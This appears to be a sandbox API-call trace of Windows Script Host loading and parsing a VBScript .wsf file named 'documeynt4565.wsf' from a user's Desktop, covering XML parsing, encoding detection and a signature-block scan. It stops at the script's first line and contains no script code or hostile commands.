	[0040.509] IUnknown:QueryInterface (in: This=0x82910, riid=0x7fef92e8440*(Data1=0xf29f6bc0, Data2=0x5021, Data3=0x11ce, Data4=([0]=0xaa, [1]=0x15, [2]=0x0, [3]=0x0, [4]=0x69, [5]=0x1, [6]=0x29, [7]=0x3f)), ppvObject=0x26e2b8 | out: ppvObject=0x26e2b8*=0x82918) returned 0x0
	[0040.509] IROTData:GetComparisonData (in: This=0x82918, pbData=0x26e2c0, cbMax=0x800, pcbData=0x26e2b0 | out: pbData=0x26e2c0*=0x66, pcbData=0x26e2b0*=0x68) returned 0x0
	[0040.509] IUnknown:Release (This=0x82918) returned 0x1
	[0040.509] ??2@YAPEAX_K@Z () returned 0x3ccad0
	[0040.509] IUnknown:AddRef (This=0x82910) returned 0x2
	[0040.509] _strnicmp (_Str1="<?xml", _Str="<?xml", _MaxCount=0x5) returned 0
	[0040.511] _strnicmp (_Str1="encoding", _Str="encoding", _MaxCount=0x8) returned 0
	[0040.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3c72fe, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0040.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3c72fe, cbMultiByte=12, lpWideCharStr=0x26e8e0, cchWideChar=12 | out: lpWideCharStr="windows-1251(") returned 12
	[0040.512] _wcsicmp (_String1="windows-1251", _String2="UTF-8") returned 2
	[0040.512] CoCreateInstance (in: rclsid=0x7fef92e86b0*(Data1=0x275c23e2, Data2=0x3747, Data3=0x11d0, Data4=([0]=0x9f, [1]=0xea, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3f, [6]=0x86, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fef92e86a0*(Data1=0xdccfc164, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppv=0x26e890 | out: ppv=0x26e890*=0x7c0e0) returned 0x0
	[0040.661] malloc (_Size=0xb064) returned 0x3ddfd0
	[0040.661] GetACP () returned 0x4e4
	[0040.668] realloc (_Block=0x3ddfd0, _Size=0xaf64) returned 0x3ddfd0
	[0040.668] ??2@YAPEAX_K@Z () returned 0x3e8f50
	[0040.668] free (_Block=0x3c72e0) 
	[0040.668] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0040.668] IMoniker:GetDisplayName (in: This=0x82910, pbc=0x85290, pmkToLeft=0x0, ppszDisplayName=0x26eae8 | out: ppszDisplayName=0x26eae8*="file:///C:/Users/5P5NRG~1/Desktop/documeynt4565.wsf") returned 0x0
	[0040.668] lstrlenW (lpString="file://") returned 7
	[0040.668] _wcsnicmp (_String1="file://", _String2="file://", _MaxCount=0x7) returned 0
	[0040.668] GetSystemDirectoryA (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0x14
	[0040.668] ??2@YAPEAX_K@Z () returned 0x3e8f80
	[0040.668] GetSystemDirectoryA (in: lpBuffer=0x3e8f80, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0040.668] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\shlwapi.dll") returned 0x7feffac0000
	[0040.669] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0040.669] GetProcAddress (hModule=0x7feffac0000, lpProcName="PathCreateFromUrlW") returned 0x7feffacdf84
	[0040.669] PathCreateFromUrlW (in: pszUrl="file:///C:/Users/5P5NRG~1/Desktop/documeynt4565.wsf", pszPath=0x26e880, pcchPath=0x26e870, dwFlags=0x0 | out: pszPath="C:\\Users\\5P5NRG~1\\Desktop\\documeynt4565.wsf", pcchPath=0x26e870) returned 0x0
	[0040.669] FreeLibrary (hLibModule=0x7feffac0000) returned 1
	[0040.669] ??2@YAPEAX_K@Z () returned 0x3e8f80
	[0040.669] _wcsnicmp (_String1="<?xml", _String2="<?xml", _MaxCount=0x5) returned 0
	[0040.669] malloc (_Size=0x108) returned 0x3e8fb0
	[0040.671] wcsncmp (_String1="version", _String2="version", _MaxCount=0x7) returned 0
	[0040.671] malloc (_Size=0x208) returned 0x3e90c0
	[0040.671] wcsncmp (_String1="encoding", _String2="encoding", _MaxCount=0x8) returned 0
	[0040.671] wcsncmp (_String1="standalone", _String2="standalone", _MaxCount=0xa) returned 0
	[0040.672] malloc (_Size=0x408) returned 0x3e92d0
	[0040.672] malloc (_Size=0xae44) returned 0x3e96e0
	[0040.673] ??2@YAPEAX_K@Z () returned 0x3f4530
	[0040.673] wcsncmp (_String1="package", _String2="package", _MaxCount=0x7) returned 0
	[0040.673] malloc (_Size=0x108) returned 0x3f4570
	[0040.673] ??2@YAPEAX_K@Z () returned 0x3f4680
	[0040.673] ??2@YAPEAX_K@Z () returned 0x3f46a0
	[0040.673] ??2@YAPEAX_K@Z () returned 0x3f46c0
	[0040.673] wcsncmp (_String1="job", _String2="job", _MaxCount=0x3) returned 0
	[0040.673] wcsncmp (_String1="id", _String2="id", _MaxCount=0x2) returned 0
	[0040.673] ??2@YAPEAX_K@Z () returned 0x3f46f0
	[0040.673] ??2@YAPEAX_K@Z () returned 0x3f4710
	[0040.673] ??2@YAPEAX_K@Z () returned 0x3f4730
	[0040.673] ??2@YAPEAX_K@Z () returned 0x3f4760
	[0040.673] ??2@YAPEAX_K@Z () returned 0x3f4780
	[0040.674] ??2@YAPEAX_K@Z () returned 0x3f47a0
	[0040.674] wcsncmp (_String1="script", _String2="script", _MaxCount=0x6) returned 0
	[0040.674] wcsncmp (_String1="language", _String2="language", _MaxCount=0x8) returned 0
	[0040.674] malloc (_Size=0x208) returned 0x3f47d0
	[0040.674] CLSIDFromProgID (in: lpszProgID="VBScript", lpclsid=0x3f47f0 | out: lpclsid=0x3f47f0*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0
	[0040.675] malloc (_Size=0xae24) returned 0x3f49e0
	[0040.676] GetSystemDirectoryA (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0x14
	[0040.676] ??2@YAPEAX_K@Z () returned 0x3ff810
	[0040.676] GetSystemDirectoryA (in: lpBuffer=0x3ff810, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0040.676] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7feff550000
	[0040.676] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0040.676] GetProcAddress (hModule=0x7feff550000, lpProcName="SaferIdentifyLevel") returned 0x7feff56e470
	[0040.676] GetProcAddress (hModule=0x7feff550000, lpProcName="SaferComputeTokenFromLevel") returned 0x7feff56f9b0
	[0040.676] GetProcAddress (hModule=0x7feff550000, lpProcName="SaferCloseLevel") returned 0x7feff56f660
	[0040.676] ??2@YAPEAX_K@Z () returned 0x3ff810
	[0040.677] IdentifyCodeAuthzLevelW () returned 0x1
	[0044.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26d850 | out: lpSystemTimeAsFileTime=0x26d850*(dwLowDateTime=0xffa2b00, dwHighDateTime=0x1d5eb2b)) 
	[0044.954] GetCurrentProcessId () returned 0x998
	[0044.954] GetCurrentThreadId () returned 0x9a8
	[0044.954] GetTickCount () returned 0x1144a0b
	[0044.954] QueryPerformanceCounter (in: lpPerformanceCount=0x26d858 | out: lpPerformanceCount=0x26d858*=16546665911) returned 1
	[0044.954] malloc (_Size=0x100) returned 0x3cd1e0
	[0044.955] GetVersionExA (in: lpVersionInformation=0x26d630*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf929f810, dwBuildNumber=0x7fe, dwPlatformId=0xf9290000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x26d630*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0044.955] GetUserDefaultLCID () returned 0x409
	[0044.955] IsFileSupportedName () returned 0x1
	[0044.955] _wcsicmp (_String1=".vbs", _String2=".wsf") returned -1
	[0044.955] _wcsicmp (_String1=".vbe", _String2=".wsf") returned -1
	[0044.955] _wcsicmp (_String1=".js", _String2=".wsf") returned -13
	[0044.955] _wcsicmp (_String1=".jse", _String2=".wsf") returned -13
	[0044.955] _wcsicmp (_String1=".wsf", _String2=".wsf") returned 0
	[0044.962] GetSignedDataMsg () returned 0x0
	[0044.962] GetCurrentProcess () returned 0xffffffffffffffff
	[0044.963] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x26de90, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26de90*=0x164) returned 1
	[0044.963] GetFileSize (in: hFile=0x164, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x57b2
	[0044.963] ??2@YAPEAX_K@Z () returned 0x3c72e0
	[0044.963] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0044.963] ReadFile (in: hFile=0x164, lpBuffer=0x3c72e0, nNumberOfBytesToRead=0x57b2, lpNumberOfBytesRead=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x3c72e0*, lpNumberOfBytesRead=0x26de70*=0x57b2, lpOverlapped=0x0) returned 1
	[0044.963] CoInitialize (pvReserved=0x0) returned 0x1
	[0044.963] CoCreateInstance (in: rclsid=0x7fef929f850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef929f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x26dde0 | out: ppv=0x26dde0*=0x3ffdb0) returned 0x0
	[0044.964] DllGetClassObject (in: rclsid=0x8c9a0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7feff426cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26dad8 | out: ppv=0x26dad8*=0x3ccaa0) returned 0x0
	[0044.964] ??2@YAPEAX_K@Z () returned 0x3ccaa0
	[0044.964] IClassFactory:CreateInstance (in: This=0x3ccaa0, pUnkOuter=0x0, riid=0x7fef929f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x26db28 | out: ppvObject=0x26db28*=0x3ffdb0) returned 0x0
	[0044.964] ??2@YAPEAX_K@Z () returned 0x3ffca0
	[0044.964] GetSystemInfo (in: lpSystemInfo=0x26d900 | out: lpSystemInfo=0x26d900*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0044.964] VirtualQuery (in: lpAddress=0x26d970, lpBuffer=0x26d930, dwLength=0x30 | out: lpBuffer=0x26d930*(BaseAddress=0x26d000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0044.964] ??2@YAPEAX_K@Z () returned 0x3ffce0
	[0044.965] ??2@YAPEAX_K@Z () returned 0x3ffd00
	[0044.965] ??2@YAPEAX_K@Z () returned 0x3ffd60
	[0044.965] ??2@YAPEAX_K@Z () returned 0x3ffd90
	[0044.965] ??2@YAPEAX_K@Z () returned 0x3ffe40
	[0044.965] IUnknown:Release (This=0x3ccaa0) returned 0x0
	[0044.965] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0044.965] _strnicmp (_Str1="<?xml", _Str="<?xml", _MaxCount=0x5) returned 0
	[0044.965] _strnicmp (_Str1="encoding", _Str="encoding", _MaxCount=0x8) returned 0
	[0044.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3c72fe, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0044.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3c72fe, cbMultiByte=12, lpWideCharStr=0x26db90, cchWideChar=12 | out: lpWideCharStr="windows-1251") returned 12
	[0044.965] _wcsicmp (_String1="windows-1251", _String2="UTF-8") returned 2
	[0044.965] CoCreateInstance (in: rclsid=0x7fef92e86b0*(Data1=0x275c23e2, Data2=0x3747, Data3=0x11d0, Data4=([0]=0x9f, [1]=0xea, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3f, [6]=0x86, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fef92e86a0*(Data1=0xdccfc164, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppv=0x26db40 | out: ppv=0x26db40*=0x7c930) returned 0x0
	[0044.966] malloc (_Size=0xb064) returned 0x3ffe60
	[0044.966] GetACP () returned 0x4e4
	[0044.967] realloc (_Block=0x3ffe60, _Size=0xaf64) returned 0x3ffe60
	[0044.967] ??2@YAPEAX_K@Z () returned 0x3ccaa0
	[0044.969] IUnknown:Release (This=0x7c930) returned 0x0
	[0044.969] free (_Block=0x3ffe60) 
	[0044.969] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0044.969] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0044.969] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0044.969] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0044.969] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0044.969] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0044.969] CoUninitialize () 
	[0044.970] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0044.970] CloseHandle (hObject=0x164) returned 1
	[0044.971] wcsncmp (_String1="<?xml version", _String2="\r\n<signature>", _MaxCount=0xd) returned 47
	[0044.971] wcsncmp (_String1="?xml version=", _String2="\r\n<signature>", _MaxCount=0xd) returned 50
	[0044.971] wcsncmp (_String1="xml version='", _String2="\r\n<signature>", _MaxCount=0xd) returned 107
	[0044.971] wcsncmp (_String1="ml version='1", _String2="\r\n<signature>", _MaxCount=0xd) returned 96
	[0044.971] wcsncmp (_String1="l version='1.", _String2="\r\n<signature>", _MaxCount=0xd) returned 95
	[0044.971] wcsncmp (_String1=" version='1.0", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.971] wcsncmp (_String1="version='1.0'", _String2="\r\n<signature>", _MaxCount=0xd) returned 105
	[0044.971] wcsncmp (_String1="ersion='1.0' ", _String2="\r\n<signature>", _MaxCount=0xd) returned 88
	[0044.971] wcsncmp (_String1="rsion='1.0' e", _String2="\r\n<signature>", _MaxCount=0xd) returned 101
	[0044.971] wcsncmp (_String1="sion='1.0' en", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.971] wcsncmp (_String1="ion='1.0' enc", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.971] wcsncmp (_String1="on='1.0' enco", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.971] wcsncmp (_String1="n='1.0' encod", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.971] wcsncmp (_String1="='1.0' encodi", _String2="\r\n<signature>", _MaxCount=0xd) returned 48
	[0044.971] wcsncmp (_String1="'1.0' encodin", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.971] wcsncmp (_String1="1.0' encoding", _String2="\r\n<signature>", _MaxCount=0xd) returned 36
	[0044.971] wcsncmp (_String1=".0' encoding=", _String2="\r\n<signature>", _MaxCount=0xd) returned 33
	[0044.971] wcsncmp (_String1="0' encoding='", _String2="\r\n<signature>", _MaxCount=0xd) returned 35
	[0044.971] wcsncmp (_String1="' encoding='w", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.971] wcsncmp (_String1=" encoding='wi", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.971] wcsncmp (_String1="encoding='win", _String2="\r\n<signature>", _MaxCount=0xd) returned 88
	[0044.971] wcsncmp (_String1="ncoding='wind", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.971] wcsncmp (_String1="coding='windo", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.971] wcsncmp (_String1="oding='window", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.971] wcsncmp (_String1="ding='windows", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.971] wcsncmp (_String1="ing='windows-", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.971] wcsncmp (_String1="ng='windows-1", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.972] wcsncmp (_String1="g='windows-12", _String2="\r\n<signature>", _MaxCount=0xd) returned 90
	[0044.972] wcsncmp (_String1="='windows-125", _String2="\r\n<signature>", _MaxCount=0xd) returned 48
	[0044.972] wcsncmp (_String1="'windows-1251", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.972] wcsncmp (_String1="windows-1251'", _String2="\r\n<signature>", _MaxCount=0xd) returned 106
	[0044.972] wcsncmp (_String1="indows-1251' ", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.972] wcsncmp (_String1="ndows-1251' s", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.972] wcsncmp (_String1="dows-1251' st", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.972] wcsncmp (_String1="ows-1251' sta", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.972] wcsncmp (_String1="ws-1251' stan", _String2="\r\n<signature>", _MaxCount=0xd) returned 106
	[0044.972] wcsncmp (_String1="s-1251' stand", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.972] wcsncmp (_String1="-1251' standa", _String2="\r\n<signature>", _MaxCount=0xd) returned 32
	[0044.972] wcsncmp (_String1="1251' standal", _String2="\r\n<signature>", _MaxCount=0xd) returned 36
	[0044.972] wcsncmp (_String1="251' standalo", _String2="\r\n<signature>", _MaxCount=0xd) returned 37
	[0044.972] wcsncmp (_String1="51' standalon", _String2="\r\n<signature>", _MaxCount=0xd) returned 40
	[0044.972] wcsncmp (_String1="1' standalone", _String2="\r\n<signature>", _MaxCount=0xd) returned 36
	[0044.972] wcsncmp (_String1="' standalone=", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.972] wcsncmp (_String1=" standalone='", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.972] wcsncmp (_String1="standalone='y", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.972] wcsncmp (_String1="tandalone='ye", _String2="\r\n<signature>", _MaxCount=0xd) returned 103
	[0044.972] wcsncmp (_String1="andalone='yes", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.972] wcsncmp (_String1="ndalone='yes'", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.972] wcsncmp (_String1="dalone='yes'?", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.972] wcsncmp (_String1="alone='yes'?>", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.972] wcsncmp (_String1="lone='yes'?>\r", _String2="\r\n<signature>", _MaxCount=0xd) returned 95
	[0044.972] wcsncmp (_String1="one='yes'?>\r\n", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.972] wcsncmp (_String1="ne='yes'?>\r\n<", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.972] wcsncmp (_String1="e='yes'?>\r\n<p", _String2="\r\n<signature>", _MaxCount=0xd) returned 88
	[0044.973] wcsncmp (_String1="='yes'?>\r\n<pa", _String2="\r\n<signature>", _MaxCount=0xd) returned 48
	[0044.973] wcsncmp (_String1="'yes'?>\r\n<pac", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.973] wcsncmp (_String1="yes'?>\r\n<pack", _String2="\r\n<signature>", _MaxCount=0xd) returned 108
	[0044.973] wcsncmp (_String1="es'?>\r\n<packa", _String2="\r\n<signature>", _MaxCount=0xd) returned 88
	[0044.973] wcsncmp (_String1="s'?>\r\n<packag", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.973] wcsncmp (_String1="'?>\r\n<package", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.973] wcsncmp (_String1="?>\r\n<package>", _String2="\r\n<signature>", _MaxCount=0xd) returned 50
	[0044.973] wcsncmp (_String1=">\r\n<package>\r", _String2="\r\n<signature>", _MaxCount=0xd) returned 49
	[0044.973] wcsncmp (_String1="\r\n<package>\r\n", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.973] wcsncmp (_String1="\n<package>\r\n<", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.973] wcsncmp (_String1="<package>\r\n<j", _String2="\r\n<signature>", _MaxCount=0xd) returned 47
	[0044.973] wcsncmp (_String1="package>\r\n<jo", _String2="\r\n<signature>", _MaxCount=0xd) returned 99
	[0044.973] wcsncmp (_String1="ackage>\r\n<job", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.973] wcsncmp (_String1="ckage>\r\n<job ", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.973] wcsncmp (_String1="kage>\r\n<job i", _String2="\r\n<signature>", _MaxCount=0xd) returned 94
	[0044.973] wcsncmp (_String1="age>\r\n<job id", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.973] wcsncmp (_String1="ge>\r\n<job id=", _String2="\r\n<signature>", _MaxCount=0xd) returned 90
	[0044.973] wcsncmp (_String1="e>\r\n<job id='", _String2="\r\n<signature>", _MaxCount=0xd) returned 88
	[0044.973] wcsncmp (_String1=">\r\n<job id='j", _String2="\r\n<signature>", _MaxCount=0xd) returned 49
	[0044.973] wcsncmp (_String1="\r\n<job id='jo", _String2="\r\n<signature>", _MaxCount=0xd) returned -9
	[0044.973] wcsncmp (_String1="\n<job id='job", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.973] wcsncmp (_String1="<job id='job1", _String2="\r\n<signature>", _MaxCount=0xd) returned 47
	[0044.973] wcsncmp (_String1="job id='job1'", _String2="\r\n<signature>", _MaxCount=0xd) returned 93
	[0044.973] wcsncmp (_String1="ob id='job1'>", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.973] wcsncmp (_String1="b id='job1'>\r", _String2="\r\n<signature>", _MaxCount=0xd) returned 85
	[0044.973] wcsncmp (_String1=" id='job1'>\r\n", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.974] wcsncmp (_String1="id='job1'>\r\n<", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.974] wcsncmp (_String1="d='job1'>\r\n<s", _String2="\r\n<signature>", _MaxCount=0xd) returned 87
	[0044.974] wcsncmp (_String1="='job1'>\r\n<sc", _String2="\r\n<signature>", _MaxCount=0xd) returned 48
	[0044.974] wcsncmp (_String1="'job1'>\r\n<scr", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.974] wcsncmp (_String1="job1'>\r\n<scri", _String2="\r\n<signature>", _MaxCount=0xd) returned 93
	[0044.974] wcsncmp (_String1="ob1'>\r\n<scrip", _String2="\r\n<signature>", _MaxCount=0xd) returned 98
	[0044.974] wcsncmp (_String1="b1'>\r\n<script", _String2="\r\n<signature>", _MaxCount=0xd) returned 85
	[0044.974] wcsncmp (_String1="1'>\r\n<script ", _String2="\r\n<signature>", _MaxCount=0xd) returned 36
	[0044.974] wcsncmp (_String1="'>\r\n<script l", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.974] wcsncmp (_String1=">\r\n<script la", _String2="\r\n<signature>", _MaxCount=0xd) returned 49
	[0044.974] wcsncmp (_String1="\r\n<script lan", _String2="\r\n<signature>", _MaxCount=0xd) returned -6
	[0044.974] wcsncmp (_String1="\n<script lang", _String2="\r\n<signature>", _MaxCount=0xd) returned -3
	[0044.974] wcsncmp (_String1="<script langu", _String2="\r\n<signature>", _MaxCount=0xd) returned 47
	[0044.974] wcsncmp (_String1="script langua", _String2="\r\n<signature>", _MaxCount=0xd) returned 102
	[0044.974] wcsncmp (_String1="cript languag", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.974] wcsncmp (_String1="ript language", _String2="\r\n<signature>", _MaxCount=0xd) returned 101
	[0044.974] wcsncmp (_String1="ipt language=", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.974] wcsncmp (_String1="pt language='", _String2="\r\n<signature>", _MaxCount=0xd) returned 99
	[0044.974] wcsncmp (_String1="t language='V", _String2="\r\n<signature>", _MaxCount=0xd) returned 103
	[0044.974] wcsncmp (_String1=" language='VB", _String2="\r\n<signature>", _MaxCount=0xd) returned 19
	[0044.974] wcsncmp (_String1="language='VBS", _String2="\r\n<signature>", _MaxCount=0xd) returned 95
	[0044.974] wcsncmp (_String1="anguage='VBSc", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.974] wcsncmp (_String1="nguage='VBScr", _String2="\r\n<signature>", _MaxCount=0xd) returned 97
	[0044.974] wcsncmp (_String1="guage='VBScri", _String2="\r\n<signature>", _MaxCount=0xd) returned 90
	[0044.974] wcsncmp (_String1="uage='VBScrip", _String2="\r\n<signature>", _MaxCount=0xd) returned 104
	[0044.975] wcsncmp (_String1="age='VBScript", _String2="\r\n<signature>", _MaxCount=0xd) returned 84
	[0044.975] wcsncmp (_String1="ge='VBScript'", _String2="\r\n<signature>", _MaxCount=0xd) returned 90
	[0044.975] wcsncmp (_String1="e='VBScript'>", _String2="\r\n<signature>", _MaxCount=0xd) returned 88
	[0044.975] wcsncmp (_String1="='VBScript'><", _String2="\r\n<signature>", _MaxCount=0xd) returned 48
	[0044.975] wcsncmp (_String1="'VBScript'><!", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.975] wcsncmp (_String1="VBScript'><![", _String2="\r\n<signature>", _MaxCount=0xd) returned 73
	[0044.975] wcsncmp (_String1="BScript'><![C", _String2="\r\n<signature>", _MaxCount=0xd) returned 53
	[0044.975] wcsncmp (_String1="Script'><![CD", _String2="\r\n<signature>", _MaxCount=0xd) returned 70
	[0044.975] wcsncmp (_String1="cript'><![CDA", _String2="\r\n<signature>", _MaxCount=0xd) returned 86
	[0044.975] wcsncmp (_String1="ript'><![CDAT", _String2="\r\n<signature>", _MaxCount=0xd) returned 101
	[0044.975] wcsncmp (_String1="ipt'><![CDATA", _String2="\r\n<signature>", _MaxCount=0xd) returned 92
	[0044.975] wcsncmp (_String1="pt'><![CDATA[", _String2="\r\n<signature>", _MaxCount=0xd) returned 99
	[0044.975] wcsncmp (_String1="t'><![CDATA[\r", _String2="\r\n<signature>", _MaxCount=0xd) returned 103
	[0044.975] wcsncmp (_String1="'><![CDATA[\r\n", _String2="\r\n<signature>", _MaxCount=0xd) returned 26
	[0044.975] wcsncmp (_String1="><![CDATA[\r\n\r", _String2="\r\n<signature>", _MaxCount=0xd) returned 49
	[0044.975] wcsncmp (_String1="<![CDATA[\r\n\r\n", _String2="\r\n<signature>", _MaxCount=0xd) returned 47
	[0044.975] wcsncmp (_String1="![CDATA[\r\n\r\n\x09", _String2="\r\n<signature>", _MaxCount=0xd) returned 20
	[0044.975] wcsncmp (_String1="[CDATA[\r\n\r\n\x09F", _String2="\r\n<signature>", _MaxCount=0xd) returned 78
	[0044.975] wcsncmp (_String1="CDATA[\r\n\r\n\x09Fu", _String2="\r\n<signature>", _MaxCount=0xd) returned 54
	[0044.975] wcsncmp (_String1="DATA[\r\n\r\n\x09Fun", _String2="\r\n<signature>", _MaxCount=0xd) returned 55
	[0044.975] wcsncmp (_String1="ATA[\r\n\r\n\x09Func", _String2="\r\n<signature>", _MaxCount=0xd) returned 52
	[0044.975] wcsncmp (_String1="TA[\r\n\r\n\x09Funct", _String2="\r\n<signature>", _MaxCount=0xd) returned 71
	[0044.976] wcsncmp (_String1="A[\r\n\r\n\x09Functi", _String2="\r\n<signature>", _MaxCount=0xd) returned 52
	[0044.976] wcsncmp (_String1="[\r\n\r\n\x09Functio", _String2="\r\n<signature>", _MaxCount=0xd) returned 78
	[0044.976] wcsncmp (_String1="\r\n\r\n\x09Function", _String2="\r\n<signature>", _MaxCount=0xd) returned -47
